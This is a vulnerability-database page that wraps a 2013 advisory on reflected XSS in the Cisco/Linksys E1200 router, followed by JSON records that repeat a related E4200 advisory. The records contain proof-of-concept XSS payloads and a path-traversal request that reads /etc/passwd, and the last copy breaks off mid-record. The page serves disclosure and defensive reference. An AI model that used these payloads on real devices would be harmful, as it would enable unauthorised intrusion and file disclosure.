Re: Cisco/Linksys E1200 N300 Reflected XSS

2013-07-15T00:00:00

Description

Mitre has assigned the following CVE for this issue: CVE-2013-2679 On Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict <theinfinitenigma@gmail.com> wrote: > Summary > -------------------- > Software : Cisco/Linksys Router OS > Hardware : E1200 N300 (others currently untested) > Version : 2.0.04 (others currently untested) > Website : http://www.linksys.com > Issue : Reflected XSS > Severity : Medium > Researcher: Carl Benedict (theinfinitenigma) > > Product Description > -------------------- > The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch. > > Details > -------------------- > The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful. > > Sample URL #1 (HTTP GET request): > > http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27 > > Sample URL #2 (HTTP GET request): > > http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1 > > History > -------------------- > 04/26/2013 : Discovery > 04/27/2013 : Advisory released > > > -- > ? -- ?

{"id": "SECURITYVULNS:DOC:29559", "bulletinFamily": "software", "title": "Re: Cisco/Linksys E1200 N300 Reflected XSS", "description": "\r\n\r\nMitre has assigned the following CVE for this issue:\r\n\r\nCVE-2013-2679\r\n\r\nOn Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict\r\n<theinfinitenigma@gmail.com> wrote:\r\n> Summary\r\n> --------------------\r\n> Software : Cisco/Linksys Router OS\r\n> Hardware : E1200 N300 (others currently untested)\r\n> Version : 2.0.04 (others currently untested)\r\n> Website : http://www.linksys.com\r\n> Issue : Reflected XSS\r\n> Severity : Medium\r\n> Researcher: Carl Benedict (theinfinitenigma)\r\n>\r\n> Product Description\r\n> --------------------\r\n> The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch.\r\n>\r\n> Details\r\n> --------------------\r\n> The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful.\r\n>\r\n> Sample URL #1 (HTTP GET request):\r\n>\r\n> http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27\r\n>\r\n> Sample URL #2 (HTTP GET request):\r\n>\r\n> http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1\r\n>\r\n> History\r\n> --------------------\r\n> 04/26/2013 : Discovery\r\n> 04/27/2013 : Advisory released\r\n>\r\n>\r\n> --\r\n> ?\r\n\r\n\r\n\r\n-- ?\r\n", "published": "2013-07-15T00:00:00", "modified": "2013-07-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29559", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2013-2679"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:48", "edition": 1, "viewCount": 40, "enchantments": {"score": {"value": 0.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-2679"]}, {"type": "exploitdb", "idList": ["EDB-ID:25292"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:79444388E4AB6DA3A97F1DB2022E7531"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121551", "PACKETSTORM:122342"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13169"]}]}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:25292"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:79444388E4AB6DA3A97F1DB2022E7531"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122342"]}]}, "exploitation": null, "vulnersScore": 0.9}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660012827, "score": 1660013489}, "_internal": {"score_hash": "8f35716238e7dbeb5ffda38c45bfd303"}}

{"packetstorm": [{"lastseen": "2016-12-05T22:21:09", "description": "", "cvss3": {}, "published": "2013-07-10T00:00:00", "type": "packetstorm", "title": "Cisco Linksys E1200 / N300 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2679"], "modified": "2013-07-10T00:00:00", "id": "PACKETSTORM:122342", "href": "https://packetstormsecurity.com/files/122342/Cisco-Linksys-E1200-N300-Cross-Site-Scripting.html", "sourceData": "`Summary \n-------------------- \nSoftware : Cisco/Linksys Router OS \nHardware : E1200 N300 (others currently untested) \nVersion : 2.0.04 (others currently untested) \nWebsite : http://www.linksys.com \nIssue : Reflected XSS \nSeverity : Medium \nResearcher: Carl Benedict (theinfinitenigma) \n \nProduct Description \n-------------------- \nThe Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch. \n \nDetails \n-------------------- \nThe apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful. \n \nSample URL #1 (HTTP GET request): \n \nhttp://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27 \n \nSample URL #2 (HTTP GET request): \n \nhttp://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1 \n \nHistory \n-------------------- \n04/26/2013 : Discovery \n04/27/2013 : Advisory released \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122342/ciscolinksyse1200-xss.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-05T22:25:06", "description": "", "cvss3": {}, "published": "2013-05-07T00:00:00", "type": "packetstorm", "title": "Cisco Linksys E4200 Cross Site Scripting / Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2678", "CVE-2013-2680", "CVE-2013-2681", "CVE-2013-2684", "CVE-2013-2679", "CVE-2013-2682", "CVE-2013-2683"], "modified": "2013-05-07T00:00:00", "id": "PACKETSTORM:121551", "href": "https://packetstormsecurity.com/files/121551/Cisco-Linksys-E4200-Cross-Site-Scripting-Local-File-Inclusion.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA256 \n \n============================================= \n \nXSS, LFI in Cisco, Linksys E4200 Firmware \n \n============================================= \n \nURL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html \n \n============================================= \n \n \nJanuary 30, 2013 \n \n============================================= \n \nKeywords \n \n============================================= \n \nXSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, \nZero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp \n \nCVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, \nCVE-2013-2683, CVE-2013-2684 \n \n============================================= \n \nSummary \n \nReflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router \nFirmware Version: 1.0.05 build 7 were discovered by our Researchers in \nJanuary 2013 and finally acknowledged by Linksys in April 2013. The Vendor \nis unable to Patch the Vulnerability in a reasonable timeframe. This \ndocument will introduce and discuss the vulnerability and provide \nProof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version \n1.10 Released on July 9, 2012, and prior versions. \n \n============================================= \n \nOverview \n \nLinksys is a brand of home and small office networking products and a \ncompany founded in 1988, which was acquired by Cisco Systems in 2003. In \n2013, as part of its push away from the consumer market, Cisco sold their \nhome networking division and Linksys to Belkin. Former Linksys products are \nnow branded as Linksys by Cisco. \n \n \n \nProducts currently and previously sold under the Linksys brand name include \nbroadband and wireless routers, consumer and small business grade Ethernet \nswitching, VoIP equipment, wireless internet video camera, AV products, \nnetwork storage systems, and other products. \n \n \n \nLinksys products were widely available in North America off-the-shelf from \nboth consumer electronics stores (CompUSA and Best Buy), internet \nretailers, and big-box retail stores (WalMart). Linksys' significant \ncompetition as an independent networking firm were D-Link and NetGear, the \nlatter for a time being a brand of Cisco competitor Nortel. \n \n============================================= \n \nVendor Software Fingerprint \n \n============================================= \n \n# Copyright (C) 2009, CyberTAN Corporation \n \n# All Rights Reserved. \n \n# \n \n# THIS SOFTWARE IS OFFERED \"AS IS\", AND CYBERTAN GRANTS NO WARRANTIES OF \nANY \n \n# KIND, EXPRESS OR IMPLIED, BY STATUTE..... \n \n============================================= \n \nThe PoC's \n \n============================================= \n \nLFI PoC \n \n============================================= \n \nPOST /storage/apply.cgi HTTP/1.1 \n \nHOST: my.vunerable.e4500.firmware \n \nsubmit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila \n_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd \n \n============================================= \n \nXSS PoC \n \n============================================= \n \n/apply.cgi [log_type parameter] \n \n/apply.cgi [ping_ip parameter] \n \n/apply.cgi [ping_size parameter] \n \n/apply.cgi [submit_type parameter] \n \n/apply.cgi [traceroute_ip parameter] \n \n/storage/apply.cgi [new_workgroup parameter] \n \n/storage/apply.cgi [submit_button parameter] \n \n============================================= \n \nPOST /apply.cgi HTTP/1.1 \n \n\ufffd.. \n \nchange_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t \nype=&log_type=ilog14568\"%3balert(1)//482 \n \n============================================= \n \nOther XSS PoC\ufffds \n \n============================================= \n \n&ping_ip='><script>alert(1)</script> \n \n&ping_size='><script>alert(1)</script> \n \n&submit_type=start_traceroute'%3balert(1)// \n \n&traceroute_ip=a.b.c.d\"><script>alert(1)</script> \n \n============================================= \n \nCVE Information \n \n============================================= \n \nFile path traversal CVE-2013-2678 \n \nCross-site scripting (reflected) CVE-2013-2679 \n \nCleartext submission of password CVE-2013-2680 \n \nPassword field with autocomplete enabled CVE-2013-2681 \n \nFrameable response (Clickjacking) CVE-2013-2682 \n \nPrivate IP addresses disclosed CVE-2013-2683 \n \nHTML does not specify charset CVE-2013-2684 \n \nCVSS Version 2 Score = 4.5 \n \n============================================= \n \nEND \n \n============================================= \n \n-----BEGIN PGP SIGNATURE----- \nVersion: 10.2.0.2526 \n \nwsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser \nM3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG \nuJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy \nul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy \n7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI \nV8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg== \n=w123 \n-----END PGP SIGNATURE----- \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/121551/ciscolinksyse4200-xsslfi.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T12:37:52", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Linksys E4200 router with firmware 1.0.05 build 7 allow remote attackers to inject arbitrary web script or HTML via the (1) log_type, (2) ping_ip, (3) ping_size, (4) submit_type, or (5) traceroute_ip parameter to apply.cgi or (6) new_workgroup or (7) submit_button parameter to storage/apply.cgi.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-02-18T17:15:00", "type": "cve", "title": "CVE-2013-2679", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2679"], "modified": "2020-02-27T16:58:00", "cpe": ["cpe:/o:belkin:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2679", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2679", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:belkin:linksys_e4200_firmware:1.0.05:build7:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:09:52", "description": "Crossite request forgery, XSS, code execution in web administration interface.", "edition": 1, "cvss3": {}, "published": "2013-07-15T00:00:00", "title": "Linksys routers security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2679", "CVE-2013-3568"], "modified": "2013-07-15T00:00:00", "id": "SECURITYVULNS:VULN:13169", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13169", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:09", "description": "\nCisco Linksys E4200 - Multiple Vulnerabilities", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-05-07T00:00:00", "title": "Cisco Linksys E4200 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2678", "CVE-2013-2680", "CVE-2013-2681", "CVE-2013-2684", "CVE-2013-2679", "CVE-2013-2682", "CVE-2013-2683"], "modified": "2013-05-07T00:00:00", "id": "EXPLOITPACK:79444388E4AB6DA3A97F1DB2022E7531", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=============================================\n\nXSS, LFI in Cisco, Linksys E4200 Firmware\n\n=============================================\n\nURL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html\n\n=============================================\n\n\nJanuary 30, 2013\n\n=============================================\n\nKeywords\n\n=============================================\n\nXSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,\nZero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp\n\nCVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,\nCVE-2013-2683, CVE-2013-2684\n\n=============================================\n\nSummary\n\nReflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router\nFirmware Version: 1.0.05 build 7 were discovered by our Researchers in\nJanuary 2013 and finally acknowledged by Linksys in April 2013. The Vendor\nis unable to Patch the Vulnerability in a reasonable timeframe. This\ndocument will introduce and discuss the vulnerability and provide\nProof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version\n1.10 Released on July 9, 2012, and prior versions.\n\n=============================================\n\nOverview\n\nLinksys is a brand of home and small office networking products and a\ncompany founded in 1988, which was acquired by Cisco Systems in 2003. In\n2013, as part of its push away from the consumer market, Cisco sold their\nhome networking division and Linksys to Belkin. Former Linksys products are\nnow branded as Linksys by Cisco.\n\n\n\nProducts currently and previously sold under the Linksys brand name include\nbroadband and wireless routers, consumer and small business grade Ethernet\nswitching, VoIP equipment, wireless internet video camera, AV products,\nnetwork storage systems, and other products.\n\n\n\nLinksys products were widely available in North America off-the-shelf from\nboth consumer electronics stores (CompUSA and Best Buy), internet\nretailers, and big-box retail stores (WalMart). Linksys' significant\ncompetition as an independent networking firm were D-Link and NetGear, the\nlatter for a time being a brand of Cisco competitor Nortel.\n\n=============================================\n\nVendor Software Fingerprint\n\n=============================================\n\n# Copyright (C) 2009, CyberTAN Corporation\n\n# All Rights Reserved.\n\n#\n\n# THIS SOFTWARE IS OFFERED \"AS IS\", AND CYBERTAN GRANTS NO WARRANTIES OF\nANY\n\n# KIND, EXPRESS OR IMPLIED, BY STATUTE.....\n\n=============================================\n\nThe PoC's\n\n=============================================\n\nLFI PoC\n\n=============================================\n\nPOST /storage/apply.cgi HTTP/1.1\n\nHOST: my.vunerable.e4500.firmware\n\nsubmit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila\n_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd\n\n=============================================\n\nXSS PoC\n\n=============================================\n\n /apply.cgi [log_type parameter]\n\n /apply.cgi [ping_ip parameter]\n\n /apply.cgi [ping_size parameter]\n\n /apply.cgi [submit_type parameter]\n\n /apply.cgi [traceroute_ip parameter]\n\n /storage/apply.cgi [new_workgroup parameter]\n\n /storage/apply.cgi [submit_button parameter]\n\n=============================================\n\nPOST /apply.cgi HTTP/1.1\n\n\ufffd..\n\nchange_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t\nype=&log_type=ilog14568\"%3balert(1)//482\n\n=============================================\n\nOther XSS PoC\ufffds\n\n=============================================\n\n&ping_ip='><script>alert(1)</script>\n\n&ping_size='><script>alert(1)</script>\n\n&submit_type=start_traceroute'%3balert(1)//\n\n&traceroute_ip=a.b.c.d\"><script>alert(1)</script>\n\n=============================================\n\nCVE Information\n\n=============================================\n\nFile path traversal CVE-2013-2678\n\nCross-site scripting (reflected) CVE-2013-2679\n\nCleartext submission of password CVE-2013-2680\n\nPassword field with autocomplete enabled CVE-2013-2681\n\nFrameable response (Clickjacking) CVE-2013-2682\n\nPrivate IP addresses disclosed CVE-2013-2683\n\nHTML does not specify charset CVE-2013-2684\n\nCVSS Version 2 Score = 4.5\n\n=============================================\n\nEND\n\n=============================================\n\n-----BEGIN PGP SIGNATURE-----\nVersion: 10.2.0.2526\n\nwsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser\nM3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG\nuJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy\nul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy\n7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI\nV8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg==\n=w123\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-09T02:35:09", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2013-05-07T00:00:00", "type": "exploitdb", "title": "Cisco Linksys E4200 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2013-2678", "2013-2679", "2013-2680", "2013-2681", "2013-2682", "2013-2683", "2013-2684", "CVE-2013-2678", "CVE-2013-2679", "CVE-2013-2680", "CVE-2013-2681", "CVE-2013-2682", "CVE-2013-2683", "CVE-2013-2684"], "modified": "2013-05-07T00:00:00", "id": "EDB-ID:25292", "href": "https://www.exploit-db.com/exploits/25292", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\n=============================================\r\n\r\nXSS, LFI in Cisco, Linksys E4200 Firmware\r\n\r\n=============================================\r\n\r\nURL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html\r\n\r\n=============================================\r\n\r\n\r\nJanuary 30, 2013\r\n\r\n=============================================\r\n\r\nKeywords\r\n\r\n=============================================\r\n\r\nXSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,\r\nZero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp\r\n\r\nCVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,\r\nCVE-2013-2683, CVE-2013-2684\r\n\r\n=============================================\r\n\r\nSummary\r\n\r\nReflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router\r\nFirmware Version: 1.0.05 build 7 were discovered by our Researchers in\r\nJanuary 2013 and finally acknowledged by Linksys in April 2013. The Vendor\r\nis unable to Patch the Vulnerability in a reasonable timeframe. This\r\ndocument will introduce and discuss the vulnerability and provide\r\nProof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version\r\n1.10 Released on July 9, 2012, and prior versions.\r\n\r\n=============================================\r\n\r\nOverview\r\n\r\nLinksys is a brand of home and small office networking products and a\r\ncompany founded in 1988, which was acquired by Cisco Systems in 2003. In\r\n2013, as part of its push away from the consumer market, Cisco sold their\r\nhome networking division and Linksys to Belkin. Former Linksys products are\r\nnow branded as Linksys by Cisco.\r\n\r\n\r\n\r\nProducts currently and previously sold under the Linksys brand name include\r\nbroadband and wireless routers, consumer and small business grade Ethernet\r\nswitching, VoIP equipment, wireless internet video camera, AV products,\r\nnetwork storage systems, and other products.\r\n\r\n\r\n\r\nLinksys products were widely available in North America off-the-shelf from\r\nboth consumer electronics stores (CompUSA and Best Buy), internet\r\nretailers, and big-box retail stores (WalMart). Linksys' significant\r\ncompetition as an independent networking firm were D-Link and NetGear, the\r\nlatter for a time being a brand of Cisco competitor Nortel.\r\n\r\n=============================================\r\n\r\nVendor Software Fingerprint\r\n\r\n=============================================\r\n\r\n# Copyright (C) 2009, CyberTAN Corporation\r\n\r\n# All Rights Reserved.\r\n\r\n#\r\n\r\n# THIS SOFTWARE IS OFFERED \"AS IS\", AND CYBERTAN GRANTS NO WARRANTIES OF\r\nANY\r\n\r\n# KIND, EXPRESS OR IMPLIED, BY STATUTE.....\r\n\r\n=============================================\r\n\r\nThe PoC's\r\n\r\n=============================================\r\n\r\nLFI PoC\r\n\r\n=============================================\r\n\r\nPOST /storage/apply.cgi HTTP/1.1\r\n\r\nHOST: my.vunerable.e4500.firmware\r\n\r\nsubmit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila\r\n_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd\r\n\r\n=============================================\r\n\r\nXSS PoC\r\n\r\n=============================================\r\n\r\n /apply.cgi [log_type parameter]\r\n\r\n /apply.cgi [ping_ip parameter]\r\n\r\n /apply.cgi [ping_size parameter]\r\n\r\n /apply.cgi [submit_type parameter]\r\n\r\n /apply.cgi [traceroute_ip parameter]\r\n\r\n /storage/apply.cgi [new_workgroup parameter]\r\n\r\n /storage/apply.cgi [submit_button parameter]\r\n\r\n=============================================\r\n\r\nPOST /apply.cgi HTTP/1.1\r\n\r\n\ufffd..\r\n\r\nchange_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t\r\nype=&log_type=ilog14568\"%3balert(1)//482\r\n\r\n=============================================\r\n\r\nOther XSS PoC\ufffds\r\n\r\n=============================================\r\n\r\n&ping_ip='><script>alert(1)</script>\r\n\r\n&ping_size='><script>alert(1)</script>\r\n\r\n&submit_type=start_traceroute'%3balert(1)//\r\n\r\n&traceroute_ip=a.b.c.d\"><script>alert(1)</script>\r\n\r\n=============================================\r\n\r\nCVE Information\r\n\r\n=============================================\r\n\r\nFile path traversal CVE-2013-2678\r\n\r\nCross-site scripting (reflected) CVE-2013-2679\r\n\r\nCleartext submission of password CVE-2013-2680\r\n\r\nPassword field with autocomplete enabled 